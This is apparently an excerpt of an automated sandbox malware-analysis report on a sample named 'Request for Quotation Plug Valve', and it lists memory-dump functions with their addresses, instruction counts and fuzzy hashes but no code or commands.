Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60116a524dcf85899d91495cf297a73db7d4b5076c0e89a692c44488be317a85
Instruction ID: 12e941573cbed11a6fdfea7a28877b36394e9ceb2154820b2d3b88e2af952be6
Opcode Fuzzy Hash: 60116a524dcf85899d91495cf297a73db7d4b5076c0e89a692c44488be317a85
Instruction Fuzzy Hash: 73521E34901219CFDB68FF28EA94A9DBBB2FB88305F1055A9D409AB759DF705E81CF40

Function 02AB0CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166b952183c44f3123270e67e1214271cc4f3a107ad9044757eb8a99f15eab8c
Instruction ID: caa711348fa06067ebd52afa176e1bc6a711d646472b648f6c4ce59e7be7e275
Opcode Fuzzy Hash: 166b952183c44f3123270e67e1214271cc4f3a107ad9044757eb8a99f15eab8c
Instruction Fuzzy Hash: 01522E34901219CFDB68FF28EA94A9DBBB2FB88305F1055A9D409AB759DF705E81CF40

Function 02AB76F1 Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca53bcc6a42b08c26ec753f45c58470bfdf4b2187472318d37154f0b6f70b78
Instruction ID: 9fadca3b1c2aa0601e5fac599294d2ffa59351bb59741ae9aa7ab67a58816849
Opcode Fuzzy Hash: aca53bcc6a42b08c26ec753f45c58470bfdf4b2187472318d37154f0b6f70b78
Instruction Fuzzy Hash: 4B125A31A00209CFCB15CF69D884AEEBBF6FF89314F158559E5069B2A2DBB0ED41CB50

Function 02AB5F38 Relevance: .3, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0431ffcbbc085990ea291a815b9852ec59c6adacbf64e73bb852565f0c40b5cd
Instruction ID: 24ad7694f0c8511b6ffe245e561a4d85b243c23e7f43be0c4aec056bfa0cbd3a
Opcode Fuzzy Hash: 0431ffcbbc085990ea291a815b9852ec59c6adacbf64e73bb852565f0c40b5cd
Instruction Fuzzy Hash: FF919B307042558FEB16AF35D898BAE7BFAFF88704F048469E5068B396DF748845CB91

Function 02AB6498 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802b3628b2db70184b31453c157bbfc3b784854ab89e0de1e6b0ed28eef560b
Instruction ID: 98f3186f15badf9f40699e3ed64d9269316ede7c47ee00f3008b59b085ac04dc
Opcode Fuzzy Hash: e802b3628b2db70184b31453c157bbfc3b784854ab89e0de1e6b0ed28eef560b
Instruction Fuzzy Hash: A481BE30A00505DFCB1ACF79C494AEABBBEBF89A18B158169D505D736ADF31EC41CB90

Function 02AB9A10 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3a817464646c6dc9ef40849a90fe9936523ac94463ed0abc8a5a367b7f9767
Instruction ID: 1744316c6a1ca4d7edb6b8cc1da5a6c7aea0a0a6d385e65205d70ee8152d94fe
Opcode Fuzzy Hash: 1a3a817464646c6dc9ef40849a90fe9936523ac94463ed0abc8a5a367b7f9767
Instruction Fuzzy Hash: 0E8119315006069FC712CF68C4846DBBBBAFF45324B15C659DA5897396DB31F852CFA0

Function 02AB80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b671189a82c4c18612fe2e2ea5c0806c370c42486b04e86073c8f0035a1342ba
Instruction ID: 3c492d35d837514079090200e607f167f4ba5425d6ff19bdfb373737d2300876
Opcode Fuzzy Hash: b671189a82c4c18612fe2e2ea5c0806c370c42486b04e86073c8f0035a1342ba
Instruction Fuzzy Hash: FA711C34B006458FDB16DF6CC894AAEBBEDAF89244B1540A5E815DB3B2DF78DC41CB50

Function 02ABF3F1 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0797aaf47e500cb7dd552d8ce7e30f0ea7c3888b5d6ae4560dc8ddf79a851e
Instruction ID: aa42bf6d9566dff33b7d6db5871cf5989c82fb2c8c395664d29960ab3b383ddb
Opcode Fuzzy Hash: 4f0797aaf47e500cb7dd552d8ce7e30f0ea7c3888b5d6ae4560dc8ddf79a851e
Instruction Fuzzy Hash: 79510174D01218CFEB25DFE4D994BADBBB2FF89300F209129E805AB295DB755A46CF40

Function 02AB9C30 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1807b975038620cf8e775d4649e01896f1203e5610621355b804d1d4f6c92524
Instruction ID: ee097fcb03d14868ed837b62cf5e2403705e76bf4b32bc891749424c47da278e
Opcode Fuzzy Hash: 1807b975038620cf8e775d4649e01896f1203e5610621355b804d1d4f6c92524
Instruction Fuzzy Hash: DE5181307042559FDB01DF69C884BAFBBAAFF89314F148465EA08CB256DB71DC41CB91

Function 02ABD548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d99b47328513e2c0043e02ff9d5735e277c2b565c9147f5ffea0a666bc2ebf
Instruction ID: 07a8be7824540388e86f3803f78c299ac6762f04fdb0f8b559718af64c18b1b7
Opcode Fuzzy Hash: 75d99b47328513e2c0043e02ff9d5735e277c2b565c9147f5ffea0a666bc2ebf
Instruction Fuzzy Hash: 9951B474E01208DFDB58DFA9D5849DDBBF2BF89310F248169E819AB364DB30A801CF50

Function 02AB41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b207a01e0359990b5b1c051f5aa61613249c05d02b828039a3f1fb7ca7b967
Instruction ID: 9f6aa1c2858c9e2587437699b926f8504678e5182e10e5388aadf91cb1e775cf
Opcode Fuzzy Hash: 29b207a01e0359990b5b1c051f5aa61613249c05d02b828039a3f1fb7ca7b967
Instruction Fuzzy Hash: A951A475E01208CFCB09EFA9D59499DBBF6FF89304B209469E805AB325DB31AD42CF50

Function 02ABA303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21efeb25ebf564fb4f8149b0b0f2c174e5ee1a890f034dbe200f352e041be317
Instruction ID: 68827b11b3ee13d56b005bc52e96233c8f686b0e7880834828b6a081fff94e3c
Opcode Fuzzy Hash: 21efeb25ebf564fb4f8149b0b0f2c174e5ee1a890f034dbe200f352e041be317
Instruction Fuzzy Hash: 20419C35A04249DFCF16CFA8C888BDEBFB6AF89314F048455E905AB293DB74E954CB50

Function 02ABAEBA Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66181f417252d98e2d2a0ef3d3cf4522fbc6672a39aac93f8a1426f8adbf7d21
Instruction ID: 0507f38a1d7f6523c606bb8ee5510f93a9b506e6011932cb148e5f9a9b6adcc9
Opcode Fuzzy Hash: 66181f417252d98e2d2a0ef3d3cf4522fbc6672a39aac93f8a1426f8adbf7d21
Instruction Fuzzy Hash: 4031DD327002049FD709ABB5D8547AEBFFABFC8610F144469E90AD7296DF319C01CBA0

Function 02AB6FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64719f0abf3109e8fd0ea892c395ac078a8cd0d42624eef968cdf1d621f750b8
Instruction ID: a8d37124cc02147e99330ee68992cf2181aca85ee1ca09700a16131c2817930d
Opcode Fuzzy Hash: 64719f0abf3109e8fd0ea892c395ac078a8cd0d42624eef968cdf1d621f750b8
Instruction Fuzzy Hash: 3B41F1316042498FCB16CF64CC44BAEBBFAEF84314F04846AE8158B292DBB5DD45CBA1

Function 02AB3CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c13007bfe1072115266069a3de59abad717bd279131b627d8ec77e05673cc2
Instruction ID: 633cedaedaf8803e8d072fa15da45a7b6aa537b1afd194a8c8f9bff60162626c
Opcode Fuzzy Hash: 97c13007bfe1072115266069a3de59abad717bd279131b627d8ec77e05673cc2
Instruction Fuzzy Hash: 0F31D5317043258BDF1956A988D43BEABAEAFC4215F14487EE916C7386EFB4CC44C7A1

Function 02AB5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd57f85d5a04afc36d433238de376227320faad1b878d1a5e67e6ec6495dbc51
Instruction ID: 3bbcef2c3cd2c0572571279cf5cfa3fa2987b9f8b5054776cb698bb6ffae419f
Opcode Fuzzy Hash: cd57f85d5a04afc36d433238de376227320faad1b878d1a5e67e6ec6495dbc51
Instruction Fuzzy Hash: 0231D130704209EFCB069F64D994AAE7FB6FF88314F408424F91597688CF79C9A1DBA0

Function 02AB8EF8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a47cebdecf4ab9f692d8953caeec6f561b888a990b5ec241bff8a8a9865c3910
Instruction ID: 09828ea2ff9ba8605072ae533c27c518a7816956f09fb2db42d3cf53e82576a0
Opcode Fuzzy Hash: a47cebdecf4ab9f692d8953caeec6f561b888a990b5ec241bff8a8a9865c3910
Instruction Fuzzy Hash: 783147303151518FDB2A9B7DD8986BE7B6FAF84610B24146BE012CB293EFACDC80C755

Function 02AB8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036a12a2799bd27b6357d761a79ecd7873f39c7660dd4c084258c50e7fc85540
Instruction ID: f7e4bae15969b3fbbf6ee1152359b150c221a0af7ac66bf51d62f1f6ee941290
Opcode Fuzzy Hash: 036a12a2799bd27b6357d761a79ecd7873f39c7660dd4c084258c50e7fc85540
Instruction Fuzzy Hash: 0A2180343042118FEB165B2D84947BF769EAFC8758F148039E506CB79AEFA9CC82D791

Function 02AB9920 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a80f80666bed90843ab44e4873e43c7b20ddbb985f9af9f83f3638e9d2dda4b
Instruction ID: e2bbfc78987ee307cd57b8ceaa9d6b82942777541d6e4b3bc072c3f50ea7b97e
Opcode Fuzzy Hash: 1a80f80666bed90843ab44e4873e43c7b20ddbb985f9af9f83f3638e9d2dda4b
Instruction Fuzzy Hash: 9B21C7314019128BC255CB39C4C56D2BB5ABF8937C7158316C57C476EADB31E862CED0

Function 02AB62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dbf2837e10f0d68a24cb4762033d2f79003ec7b2bf2ae5dce0824be20e7606c
Instruction ID: 0215b7aafcd8a31d7d0006b25650609bbd448fe4d47774a4cdb72c5b6b7403d1
Opcode Fuzzy Hash: 3dbf2837e10f0d68a24cb4762033d2f79003ec7b2bf2ae5dce0824be20e7606c
Instruction Fuzzy Hash: 5F2104357056218FD7169B29C49496EB7BAFFC9B6570844B9E826CB799CF34CC02CB80

Function 02AB28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bb89531bc27885a1a38323110537c8759815deb2b355dab738772ddbb9777e
Instruction ID: 7ee7bbceba8d759c13a2a2aa3d0665f7f3af6ad2f25a3b899514fc7f857260f1
Opcode Fuzzy Hash: 07bb89531bc27885a1a38323110537c8759815deb2b355dab738772ddbb9777e
Instruction Fuzzy Hash: 6E219F31A001499BCB15DB24D480AEE77B9EFDD360B50855AEC1A9B341DF31EA42CBD1

Function 0111D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4706735919.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846debc7202e16f8c653bdaea8bd3878bd72e1b19bdd10704a259912c1a0e20b
Instruction ID: 311205662679f2324cb0efb649e4ba4eaded46ee811b2cb830cbec14ca91f79c
Opcode Fuzzy Hash: 846debc7202e16f8c653bdaea8bd3878bd72e1b19bdd10704a259912c1a0e20b
Instruction Fuzzy Hash: 3921F172504240EFDF09DF94E9C4B2AFF65FB88318F208569E9090A25AC336D456CAA2

Function 02AB9911 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b5781c92e6e6d2ea62622aa1e40ac85c99ebfc9ee8d77095f4a60b122490e6
Instruction ID: 0e2c7685f89a0f90bc418b82f1a65d220317c33a0e8d0f2fbb024179ce858376
Opcode Fuzzy Hash: e0b5781c92e6e6d2ea62622aa1e40ac85c99ebfc9ee8d77095f4a60b122490e6
Instruction Fuzzy Hash: 732194314019129BC255CB3AC8C56D2BB5ABF8937C716831AC67C476EADB31E862CFD0

Function 0112D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707045828.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_112d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea395c46c92b58869ed38b25a2c4c66b404d13a6350709e2207ce9ff217c997
Instruction ID: 47fc359a50528e22d73227c5a0148c49933b8c4e24dce019a86aab54d82871fb
Opcode Fuzzy Hash: dea395c46c92b58869ed38b25a2c4c66b404d13a6350709e2207ce9ff217c997
Instruction Fuzzy Hash: BD213471504304EFDF1DCF64E9C0B26BB61FB84314F20C5ADE9090B262CB7AD866CA62

Function 02AB5649 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f8e119484488b435f7a04be913d3409cea939b00f87e89c0253bb16d642fbe
Instruction ID: 9dfffdcf569b7a5ec5b94075877c0c2c1e6db75dafa558ae622c7d6422ef49dd
Opcode Fuzzy Hash: 75f8e119484488b435f7a04be913d3409cea939b00f87e89c0253bb16d642fbe
Instruction Fuzzy Hash: 1B212331B04109DFDB069F68D6947AE3BB5EF58324F404424F8159B789CB78C991CBA0

Function 02AB9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0a4671e230206318daee00af7136ef8517527be9312e9a252d166f9c69f77b
Instruction ID: 5976b835852afe4a1bf4aef29c552ae55220d186ea23768e60d2decf91730086
Opcode Fuzzy Hash: aa0a4671e230206318daee00af7136ef8517527be9312e9a252d166f9c69f77b
Instruction Fuzzy Hash: 6B218D30E00249DFDF06CFA5E590AEEBFBAAF48204F148065E511E7291DB34D981DF60

Function 02ABAEF0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0949e65b20bea5bb91ae192be987ddc1135625e698da0c4c8d4a7c21da80df
Instruction ID: bd97d6cf0bc41362a5095cb991588949a0e86607af003be49fefac3b814260fb
Opcode Fuzzy Hash: 5b0949e65b20bea5bb91ae192be987ddc1135625e698da0c4c8d4a7c21da80df
Instruction Fuzzy Hash: FD119072B102049BDB108F64D885ADEBBB9FF8C310F145025F915A3291DB719C50CB90

Function 02AB6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d448fa6e9c169bc969609a86197b47fef41d7edb47eb5d3cb472b0972cf9f1c
Instruction ID: 3fc88f211b1442545cb6dc8bb45648daec8de6113d8a7437f674f67f0d9a4a57
Opcode Fuzzy Hash: 6d448fa6e9c169bc969609a86197b47fef41d7edb47eb5d3cb472b0972cf9f1c
Instruction Fuzzy Hash: F211E5353056119FD7165B2AC49497EB7AEFFC9B6530804B8E816CB395CF20DC01C790

Function 02ABF312 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca34ffaf8b6befaff5641fa88f15479eaebd0b71c4a1bf408356ecb99bb58cd9
Instruction ID: b2328c07480a9bf7c3ccc8cff7dc2d57ddc585bf6f4680ae18c698f8fe46ed76
Opcode Fuzzy Hash: ca34ffaf8b6befaff5641fa88f15479eaebd0b71c4a1bf408356ecb99bb58cd9
Instruction Fuzzy Hash: A8216370D0024ADFDB04EFA8D58079EBFF1FB84304F0495A9C118AB659EB745A45CF80

Function 0111D54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4706735919.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 1e2ca4cc911d9a50f20dd447b336ace97662c8b4464f718e18a13b8b39004a88
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 12119D76504280DFCF16CF54E5C4B16BF71FB84214F2485A9D8090A65AC33AD456CBA2

Function 02ABF320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0e4d2fe5ff5129098a657aa03f3a22ffe9f955021de6a2acc4562bb19b2f85
Instruction ID: 4a2ab731f1e513fd69fd3d0de1f1eb6872fdea21aef4ab34089e80d9b07a78be
Opcode Fuzzy Hash: 2f0e4d2fe5ff5129098a657aa03f3a22ffe9f955021de6a2acc4562bb19b2f85
Instruction Fuzzy Hash: A8113D7090020ADFDB44EFA8D58069EBFF2FB84304F1095A9C128AB659EB745A45CF80

Function 02AB27F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db0bd24106ba5f93fc869ae825025a4ade9fe82dd8b4e10f9053992808f6d0e
Instruction ID: dd655c9d09a3ebdc0597bd9263e6ef695c5df6780183e19d27a2146a6b40dab4
Opcode Fuzzy Hash: 5db0bd24106ba5f93fc869ae825025a4ade9fe82dd8b4e10f9053992808f6d0e
Instruction Fuzzy Hash: 9621CE74C1020A8FDB40EFA9D9456EEBBF4FB09300F10562AE805B3214EB305A84CFA0

Function 0112D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707045828.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_112d000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 124a7b2dded1754e6e32a0e5dbb21c8c052d5314c2e38df3364010a8debc1a9e
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: D211DD75504284CFCB1ACF64D9C4B15BFA2FB84314F24C6A9D8494B662C33AD45ACF62

Function 02AB5E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82079b374273a2be8cae01aafe39c380a321ff6a0bfd91bdafdb4dbb90aec0ff
Instruction ID: 3159ac38f5dfb763b2fea7666f8a508d3cba2528fa943f168e0607a83b5d5af9
Opcode Fuzzy Hash: 82079b374273a2be8cae01aafe39c380a321ff6a0bfd91bdafdb4dbb90aec0ff
Instruction Fuzzy Hash: 1D012832B042186BDB069F949890BEF3FABEBCC760F088029F504D7284CF718912CB90

Function 02ABABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f28bb9160dc5ff1449baaf3cab417748f48250db401d19bab6b70598a2cf725
Instruction ID: 0e6458fc6092145510896677376faa365f2a7712756d90a0b19b8c25d4132f37
Opcode Fuzzy Hash: 4f28bb9160dc5ff1449baaf3cab417748f48250db401d19bab6b70598a2cf725
Instruction Fuzzy Hash: 4BF096313006104B97175B6E9494A6AB6EEFFC9A5A3554079F90AC7363EF71CC43C790

Function 02ABE8E8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176ab6191be8caa705e339534c3c3368ccd2ee28693a159601076a220d915883
Instruction ID: 0b677b9023593cf1be03df12e8ce1422f7416810a290a4d7088b2ee459210d29
Opcode Fuzzy Hash: 176ab6191be8caa705e339534c3c3368ccd2ee28693a159601076a220d915883
Instruction Fuzzy Hash: 730188B8D0020AEFDF00DFA8E984AEEBBB1FB49304F104065D914A3318D7306A62DF90

Function 02ABFF89 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

